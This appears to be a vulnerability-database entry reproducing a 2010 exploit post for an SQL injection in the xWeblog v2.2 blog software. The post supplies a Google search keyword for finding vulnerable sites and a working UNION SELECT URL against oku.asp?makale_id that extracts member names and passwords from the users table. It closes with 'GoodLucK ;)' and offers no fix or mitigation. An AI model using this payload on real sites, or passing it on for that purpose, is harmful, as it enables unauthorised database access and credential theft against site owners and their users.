xWeblog v2.2 (oku.asp?makale_id) SQL Injection Vulnerability

2010-10-08T00:00:00
ID SSV:20155
Type seebug
Reporter Root
Modified 2010-10-08T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ===================================================
xWeblog v2.2 - Remote SQL Injection Vulnerability (tr)
===================================================
 
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : xWeblog v2.2
~Software: http://www.aspdunyasi.com/goster.asp?id=19
~Vulnerability Style : (SQLi)
~Google Keywords : "XWEBLOG"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
    ~~~~~~~~ Explotation ~~~~~~~~~~~
  
    SQL Injection
    ================================
    http://TARGET/path/oku.asp?makale_id=-67%20UNION%20SELECT+0,AD,SIFRE,3,4,5,6,7,8,9,10,11,12%20from%20uyeler
    ================================
          [+]  SQL Injected!
  
            
        
      GoodLucK ;)